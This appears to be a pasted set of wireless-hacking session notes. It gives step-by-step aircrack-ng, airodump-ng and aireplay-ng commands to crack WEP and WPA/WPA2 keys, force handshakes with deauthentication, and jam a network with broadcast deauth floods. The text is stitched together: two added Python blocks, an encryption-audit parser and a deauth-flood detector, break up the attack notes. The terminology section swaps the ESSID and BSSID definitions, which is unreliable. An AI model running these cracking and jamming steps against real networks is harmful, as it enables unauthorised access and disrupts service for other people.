Mukezh

Session Wireless Hacking

Apr 1st, 2019
========================================
CAPTURING WIRELESS COMMUNICATION PACKETS
========================================

Attacker's Machine - Kali OS
Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
Tool - Airmon-ng , Airodump-ng (Non-Graphical)


Modes of Using a Wireless Adapter :

# Standard Mode : The mode everyone normally uses to associate with a particular Access Point and use its services.
# Monitoring Mode : The mode which allows a system with a wireless network interface controller to see all traffic received from the wireless network, not only the frames addressed to it.

Command: iwconfig --> to check which mode the wifi adapter is working in


Tools we will be encountering are :

* Airmon-ng : A tool which converts our wireless card into a promiscuous mode wireless card. Yes, that means that our wireless card will hook up with anyone!
Well, that's almost correct. When our network card is in promiscuous mode, it means that it can see and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng it will receive all wireless traffic, whether intended for us or not.

Commands:
# iwconfig
# airmon-ng start wlan0
# kill PID (of the processes which might create problems)


* Airodump-ng : A tool which enables us to capture packets of our specification. This will show us some more information about a particular wireless network. So let's discuss some of the keywords.

Commands:
# airodump-ng wlan0mon


  35.  
Terminologies
==============
Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far away.

#Data : Number of captured data packets, including data broadcast packets.

#/s : Number of data packets per second, measured over the last 10 seconds.

CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.

MB : Maximum speed supported by the AP.

ENC : Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP, CCMP or MGT is present.

CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.

AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).

WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates the version supported.

ESSID : The MAC / Physical Address of the Access Point.

BSSID : Name of the Access Point.
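The ENC / CIPHER / AUTH columns above are what a defender reads to audit their own networks for weak configurations (open, WEP, TKIP). The script below is an added example, not part of the original notes: it parses text laid out like the CSV file that `airodump-ng -w` writes (the sample rows are constructed, not a real capture, and the column layout is assumed from that export format) and rates each access point using exactly the ENC, CIPHER and AUTH rules the terminology section describes.

```python
import csv
import io

# Constructed sample in the layout of an airodump-ng CSV export (not a real capture).
# Columns: BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
#          Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2019-04-01 10:00:00, 2019-04-01 10:05:00,  6,  54, OPN,      ,    , -40,  120,   0,   0.  0.  0.  0,   9, CafeGuest,
00:11:22:33:44:02, 2019-04-01 10:00:00, 2019-04-01 10:05:00, 11,  54, WEP, WEP,  SKA, -55,   98,  410,   0.  0.  0.  0,   6, OldLab,
00:11:22:33:44:03, 2019-04-01 10:00:00, 2019-04-01 10:05:00,  1,  54, WPA, TKIP, PSK, -60,  101,   0,   0.  0.  0.  0,   7, HomeNet,
00:11:22:33:44:04, 2019-04-01 10:00:00, 2019-04-01 10:05:00,  6, 130, WPA2, CCMP, PSK, -45,  115,   0,   0.  0.  0.  0,   8, OfficeAP,
00:11:22:33:44:05, 2019-04-01 10:00:00, 2019-04-01 10:05:00, 36, 300, WPA2, CCMP, MGT, -50,  110,   0,   0.  0.  0.  0,   8, CorpWiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
aa:bb:cc:dd:ee:01, 2019-04-01 10:01:00, 2019-04-01 10:04:00, -70, 12, 00:11:22:33:44:04,
"""


def parse_access_points(text):
    """Return the access-point rows of an airodump-ng-style CSV as dicts.

    The file has two tables; parsing stops at the 'Station MAC' header so
    client rows are never mistaken for access points.
    """
    aps = []
    for row in csv.reader(io.StringIO(text)):
        if not row:                      # blank separator line between tables
            continue
        cells = [c.strip() for c in row]
        if cells[0] == "BSSID":          # header of the access-point table
            continue
        if cells[0] == "Station MAC":    # start of the client table
            break
        if len(cells) < 14:              # malformed / truncated row
            continue
        aps.append({
            "bssid": cells[0].lower(),
            "channel": int(cells[3]),
            "privacy": cells[5],         # the ENC column
            "cipher": cells[6],          # the CIPHER column
            "auth": cells[7],            # the AUTH column
            "beacons": int(cells[9]),
            "essid": cells[13],
        })
    return aps


def rate_network(privacy, cipher, auth):
    """Map ENC/CIPHER/AUTH to a severity, following the column semantics above."""
    if "OPN" in privacy:
        return "high", "no encryption (OPN)"
    if "WEP" in privacy:                 # covers both 'WEP' and the undecided 'WEP?'
        return "high", "WEP in use (static or dynamic WEP)"
    if "TKIP" in cipher:
        return "medium", "WPA/WPA2 with the TKIP cipher"
    if "CCMP" in cipher and auth == "MGT":
        return "info", "WPA2 with CCMP and a separate authentication server (MGT)"
    if "CCMP" in cipher and auth == "PSK":
        return "low", "WPA2 with CCMP and a pre-shared key"
    return "unknown", f"unrecognised combination {privacy}/{cipher}/{auth}"


def audit(text):
    """Rate every access point in the CSV text; returns one finding per AP."""
    findings = []
    for ap in parse_access_points(text):
        severity, reason = rate_network(ap["privacy"], ap["cipher"], ap["auth"])
        findings.append({"essid": ap["essid"], "bssid": ap["bssid"],
                         "channel": ap["channel"], "severity": severity,
                         "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CSV):
        print(f"{f['severity']:7} {f['essid']:10} {f['bssid']} ch{f['channel']:<3} {f['reason']}")
```

Pointing `audit()` at the contents of a real `<prefix>-01.csv` written by `airodump-ng -w <prefix>` gives a quick inventory of which of your own networks are still open, WEP or TKIP; the parser deliberately ignores the station table, which lists clients rather than access points.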
  59.  
WEP
===
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
Note the target's BSSID and channel number from the output
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
Wait until the beacons number reaches 25,000
#aircrack-ng aranjit-01.cap
  71.  
WPA|WPA2
========
When there is a new device connecting
-------------------------------------
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
Note the target's BSSID and channel number from the output
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
It will help you to get the WPA handshake
#aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap


When there is no new device connecting
--------------------------------------
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
Note the target's BSSID and channel number from the output
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
It will help you to get the WPA handshake
#aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
This will make us capture the handshake
#aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
  100.  
WiFi Jammer
===========
#aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon
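The deauthentication bursts used in the two aireplay-ng steps above (a short burst to force a handshake, an endless broadcast burst to jam) are noisy on the air and easy for a wireless IDS to spot: a legitimate deauth is rare and unicast, whereas these floods repeat from the AP's address many times per second, often to FF:FF:FF:FF:FF:FF. The detector below is an added example, not part of the original notes. It works on a constructed list of 802.11 management-frame records (timestamp, type, subtype, destination, source, BSSID), which in practice a monitor-mode capture would supply; the window and threshold values are assumptions to be tuned per site.

```python
from collections import defaultdict

# 802.11 management frames: type 0; subtype 12 = deauthentication, 10 = disassociation
DEAUTH = (0, 12)
DISASSOC = (0, 10)
BEACON = (0, 8)
BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Flag (bssid, src, dst) triples whose deauth/disassoc count in any sliding
    window of `window_s` seconds reaches `threshold`.

    frames: iterable of (timestamp, type, subtype, dst, src, bssid) tuples.
    Returns a list of alert dicts; an empty list means nothing suspicious.
    """
    by_key = defaultdict(list)
    for ts, ftype, subtype, dst, src, bssid in frames:
        if (ftype, subtype) in (DEAUTH, DISASSOC):
            by_key[(bssid.lower(), src.lower(), dst.lower())].append(ts)

    alerts = []
    for (bssid, src, dst), stamps in by_key.items():
        stamps.sort()
        start = 0
        peak = 0
        # Two-pointer sliding window: advance `start` until the window fits.
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({
                "bssid": bssid,
                "src": src,
                "dst": dst,
                "peak_per_window": peak,
                "broadcast": dst == BROADCAST,   # matches the "-s FF:FF:FF:FF:FF:FF" pattern
            })
    return alerts


def build_sample_frames():
    """Constructed traffic (not a real capture): normal beacons, one genuine
    deauth, then a spoofed broadcast deauth burst from the AP's address."""
    ap = "00:11:22:33:44:04"
    client = "aa:bb:cc:dd:ee:01"
    frames = []
    # Ten beacons per second for three seconds, as a real AP would send.
    for i in range(30):
        frames.append((i * 0.1, *BEACON, BROADCAST, ap, ap))
    # A single unicast deauth: a client really being dropped by the AP.
    frames.append((0.7, *DEAUTH, client, ap, ap))
    # Twenty-five broadcast deauths in half a second: the flood signature.
    for i in range(25):
        frames.append((1.0 + i * 0.02, *DEAUTH, BROADCAST, ap, ap))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(build_sample_frames()):
        kind = "broadcast" if alert["broadcast"] else "unicast"
        print(f"deauth flood: bssid={alert['bssid']} src={alert['src']} "
              f"dst={alert['dst']} ({kind}) peak={alert['peak_per_window']}/s")
```

The single legitimate deauth never reaches the threshold, so only the burst is reported; keying on source and destination together is what separates one client being dropped from an address being used to knock everyone off the network.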